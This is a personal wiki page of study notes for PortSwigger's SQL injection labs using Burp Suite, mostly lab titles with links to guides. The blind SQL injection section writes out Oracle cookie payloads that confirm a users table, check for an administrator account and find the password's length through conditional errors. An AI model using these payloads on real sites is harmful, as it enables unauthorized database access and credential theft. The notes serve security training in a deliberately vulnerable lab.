Burp Suite/SQL Injection
From charlesreid1
This page covers how to perform SQL Injection attacks with Burp Suite.
Burp Suite Training
SQL Injection Labs
https://portswigger.net/web-security/sql-injection
Lab 1: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
- https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data
- https://www.youtube.com/watch?v=alTceRdSxS0
- lab doesn't require burp suite, just tinkering with URL parameters
- single quotes raising internal errors are a sign of SQL Injection vulnerability
Lab 2: SQL injection vulnerability allowing login bypass
- https://portswigger.net/web-security/sql-injection/lab-login-bypass
- https://www.youtube.com/watch?v=ML3aGaloczI
- lab doesn't require burp suite, just feeding SQL queries into login form
- guessing
SELECT firstname FROM users WHERE username='admin' AND password='admin' - single quotes raising internal errors are a sign of SQL Injection vulnerability
- if at first you don't succeed, try, try again: admin, administrator, etc etc etc
- https://www.youtube.com/watch?v=fMPvCyD2v4w
- This is another version of the same lab, but using the Python requests library
SQL Injection UNION Attacks
https://portswigger.net/web-security/sql-injection/union-attacks
Lab 3: SQL injection UNION attack, determining the number of columns returned by the query
- https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns
- this page covers a ton of information: SQL Injection/UNION Attack
- guide: https://www.youtube.com/watch?v=umXGHbEyW5I
Lab 4: SQL injection UNION attack, finding a column containing text
- https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text
- guide: https://www.youtube.com/watch?v=SGBTC5D7DTs
Lab 5: SQL injection UNION attack, retrieving data from other tables
- https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables
- guide: https://www.youtube.com/watch?v=6Dsj5SqR944
Lab 6: SQL injection UNION attack, retrieving multiple values in a single column
- https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-in-single-column
- guide: https://www.youtube.com/watch?v=yRVYoqR9vrI
Examining the Database
Lab 7: SQL injection attack, querying the database type and version on Oracle
Lab 8: SQL injection attack, querying the database type and version on MySQL and Microsoft
Lab 9: SQL injection attack, listing the database contents on non-Oracle databases
Lab 10: SQL injection attack, listing the database contents on Oracle
Blind SQL Injection
https://portswigger.net/web-security/sql-injection/blind
Lab 11: Blind SQL injection with conditional responses
- https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses
- https://www.youtube.com/watch?v=LBG_n9fr8sM&themeRefresh=1
Lab 12: Blind SQL injection with conditional errors
- https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors
- https://www.youtube.com/watch?v=_7w-KEP_K5w
- this one takes a while, and is faster to do with the professional edition
- visit a page, capture request, add a single quote to a cookie TrackingId parameter to raise a 500 error
step 1: prove parameter is vulnerable
- to prove the parameter is vulnerable to SQL injection, use concat operator
|| ' || (select '') || '- this is a well-formatted SQL query, but returns a 500 error
- weird, because this should work, not return a 500 error
- indication that this could be an oracle database, since it requires a FROM clause to be well-formatted
' || (select '' from dual) || '- Paste that SQL into the Cookie TrackingId, use Control + U to URL encode it
- dual is a built-in Oracle database
- this works, indicating this is, in fact, an Oracle database
- but if we replace "dual" with "dualoiweuroqiurepoiquwer" then it fails
step 2: confirm users table exists in database
' || (select from users) || '- this returns an internal server error
- the problem may be with the number of fields returned (???)
- modify query to the following:
' || (select from users where rownum = 1) || '- that returns a 200, indicating there is, in fact, a users table in the daatabase
step 3: confirm the administrator user exists in the users database
- to do this: modify prior SQL query
' || (select '' from users where username='administrator') || '- the problem: either way, this will return a 200 (if there is no administrator user, just doesn't return anything)
- solution: add conditional, and divide by zero if conditional is met
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual) || 'should cause an error' || (select CASE WHEN (1=0) THEN TO_CHAR(1/0) ELSE '' END FROM dual) || 'should NOT cause an error- now we can use that to check for the username:
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='administrator') || '- the FROM section is executed first. if it is true, then it executes the select portion of the query (which raises an error). if it is false, then it skips the select portion of the query, so it never outputs an error.
- in other words, 200 response means user does not exist in database
step 4: check the length of the password by modifying the same query
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='administrator' and LENGTH(password)>1) || '- the FROM section is executed first. if it is true (if password length > 1), it raises a 500 error. increment 1 until you get the final length of the password (whatever password length it returns 200 for).
Cheat Sheet
https://portswigger.net/web-security/sql-injection/cheat-sheet